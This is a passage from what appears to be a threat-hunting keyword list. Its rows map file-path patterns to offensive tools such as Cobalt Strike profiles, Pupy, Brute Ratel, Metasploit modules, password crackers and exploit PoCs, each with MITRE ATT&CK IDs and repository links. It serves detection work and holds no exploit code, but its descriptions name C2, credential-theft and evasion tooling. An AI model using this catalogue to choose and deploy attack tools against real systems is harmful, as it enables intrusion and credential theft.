tool to bypass Windows and Linux user passwords from a bootable USB based on Linux,T1110.004 - T1059.004 - T1070.004,TA0006 - TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Fadi002/unshackle,1,0,N/A,10,10,1482,83,2023-09-23T15:54:14Z,2023-07-19T22:30:28Z -*/unused/locktest.sh*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*/unused/Yosemite.patch*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*/unusual-port.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/updog-*.tar.gz*,greyware_tool_keyword,updog,Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.,T1567 - T1074.001 - T1020,TA0010 - TA0009,N/A,N/A,Data Exfiltration - Collection,https://github.com/sc0tfree/updog,1,1,N/A,9,10,2653,289,2023-09-26T06:56:15Z,2020-02-18T15:29:21Z -*/updog.git*,greyware_tool_keyword,updog,Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.,T1567 - T1074.001 - T1020,TA0010 - TA0009,N/A,N/A,Data Exfiltration - Collection,https://github.com/sc0tfree/updog,1,1,N/A,9,10,2653,289,2023-09-26T06:56:15Z,2020-02-18T15:29:21Z -*/updog/archive/updog-*,greyware_tool_keyword,updog,Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.,T1567 - T1074.001 - T1020,TA0010 - TA0009,N/A,N/A,Data Exfiltration - Collection,https://github.com/sc0tfree/updog,1,1,N/A,9,10,2653,289,2023-09-26T06:56:15Z,2020-02-18T15:29:21Z -*/upnp-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/uptime-agent-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/url-snarf.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/user_data/*/keylog.txt*,offensive_tool_keyword,cuddlephish,Weaponized Browser-in-the-Middle (BitM) for Penetration Testers,T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001,TA0009 - TA0006,N/A,N/A,Sniffing & Spoofing,https://github.com/fkasler/cuddlephish,1,1,N/A,10,2,152,10,2023-09-06T12:25:08Z,2023-08-02T14:30:41Z -*/userenum.go*,offensive_tool_keyword,kerbrute,A tool to perform Kerberos pre-auth bruteforcing,T1110,TA0006,N/A,N/A,Credential Access,https://github.com/ropnop/kerbrute,1,1,N/A,N/A,10,2144,368,2023-08-10T00:25:23Z,2019-02-03T18:21:17Z -*/UserlandBypass/*.c*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,0,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z -*/username-anarchy*,offensive_tool_keyword,username-anarchy,Tools for generating usernames when penetration testing. Usernames are half the password brute force problem.,T1110 - T1134 - T1078,TA0006,N/A,N/A,Credential Access,https://github.com/urbanadventurer/username-anarchy,1,1,N/A,N/A,6,564,113,2022-01-26T18:34:02Z,2012-11-07T05:35:10Z -*/UserNamespaceOverlayfsSetuidWriteExec/*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/usniper.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/usr/bin/pkexec*,offensive_tool_keyword,POC,Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team,T1068,TA0004,N/A,N/A,Exploitation tools,https://github.com/Ayrx/CVE-2021-4034,1,1,N/A,N/A,1,97,16,2022-01-27T11:57:05Z,2022-01-26T03:33:47Z -*/usr/bin/polenum*,offensive_tool_keyword,polenum,Uses Impacket Library to get the password policy from a windows machine,T1012 - T1596,TA0009 - TA0007,N/A,N/A,Discovery,https://salsa.debian.org/pkg-security-team/polenum,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*/usr/local/bin/exegol*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/usr/local/pwndrop/*,offensive_tool_keyword,pwndrop,Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.,T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005,TA0011 - TA0005 - TA0042,N/A,N/A,C2,https://github.com/kgretzky/pwndrop,1,0,N/A,10,10,1751,236,2023-02-25T05:08:15Z,2019-11-28T19:06:30Z -*/usr/share/cobaltstrike/*,offensive_tool_keyword,C2concealer,C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/RedSiege/C2concealer,1,0,N/A,10,10,850,162,2021-09-26T16:37:06Z,2020-03-23T14:13:16Z -*/usr/share/wordlists/*.txt*,offensive_tool_keyword,fcrackzip,a Free/Fast Zip Password Cracker,T1473 - T1021.002,TA0005 - TA0008,N/A,N/A,Credential Access,https://manpages.ubuntu.com/manpages/trusty/man1/fcrackzip.1.html,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/utils/addcomputer.py*,offensive_tool_keyword,sam-the-admin,script used in the POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1208 - T1218.005 - T1055.002,TA0006 - TA0007 - TA0008,N/A,N/A,Exploitation tools,https://github.com/WazeHell/sam-the-admin/tree/main/utils,1,0,N/A,N/A,10,929,190,2022-07-10T22:23:13Z,2021-12-11T15:10:30Z -*/utils/obfuscate.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/UTWOqVQ132/*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*/UUID_bypass.py*,offensive_tool_keyword,FourEye,AV Evasion Tool,T1059 - T1059.001 - T1059.005 - T1027 - T1027.005,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/lengjibo/FourEye,1,1,N/A,10,8,724,154,2021-12-08T11:55:15Z,2020-12-11T01:29:58Z -*/vainject.c*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*/vajra/phishApp.py*,offensive_tool_keyword,Vajra,Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment,T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482,TA0003 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/TROUBLE-1/Vajra,1,1,N/A,N/A,4,336,57,2023-03-16T09:45:53Z,2022-03-01T14:31:27Z -*/var/lib/ptunnel*,offensive_tool_keyword,ptunnel-ng,Tunnel TCP connections through ICMP.,T1095.001 - T1043 - T1572.001,TA0011 - TA0040 - TA0003,N/A,N/A,Data Exfiltration,https://github.com/utoni/ptunnel-ng,1,1,N/A,N/A,3,285,60,2023-05-17T12:47:52Z,2017-12-19T18:10:35Z -*/var/log/exegol/*.log*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/Vegile.git*,offensive_tool_keyword,BruteSploit,Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell,T1587 - T1588 - T1608,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Vegile,1,1,N/A,N/A,7,686,175,2022-09-01T01:54:35Z,2018-01-02T05:29:48Z -*/venom.git*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*/venom.sh *,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,0,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*/venom/,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*/ventrilo-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/versant-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/viper.conf*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*/viper.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*/viper.sln*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*/viper/Docker/*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*/viper/Docker/nginxconfig/htpasswd*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,0,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*/vipermsf*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z -*/viperpython*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,0,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*/viperpython.git*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*/virtualenvs/icebreaker*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*/VirusTotalC2/*,offensive_tool_keyword,VirusTotalC2,Abusing VirusTotal API to host our C2 traffic. usefull for bypassing blocking firewall rules if VirusTotal is in the target white list and in case you don't have C2 infrastructure. now you have a free one,T1071.004 - T1102 - T1021.002,TA0011 - TA0008 - TA0042,N/A,N/A,C2,https://github.com/RATandC2/VirusTotalC2,1,1,N/A,10,10,5,81,2022-09-28T15:10:44Z,2022-09-28T15:12:42Z -*/VisualBasicObfuscator*,offensive_tool_keyword,phishing-HTML-linter,Phishing and Social-Engineering related scripts,T1566.001 - T1056.001,TA0040 - TA0001,N/A,N/A,Phishing,https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing,1,1,N/A,10,10,2282,458,2023-06-27T19:16:49Z,2018-02-02T21:24:03Z -*/vmauthd-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/vmware_enum_*.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/VMware-CVE-2022-22954*,offensive_tool_keyword,POC,POC for VMWARE CVE-2022-22954,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/sherlocksecurity/VMware-CVE-2022-22954,1,1,N/A,N/A,3,285,53,2022-04-13T06:15:11Z,2022-04-11T13:59:23Z -*/vmware-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/vnc-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/vncdll.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/vncdll/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/vncEncoder.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/VNCHooks*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/VNCHooks.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/vnc-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/vnc-title.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/vnik_v1.c*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/voldemort-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/vpc__enum_lateral_movement*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 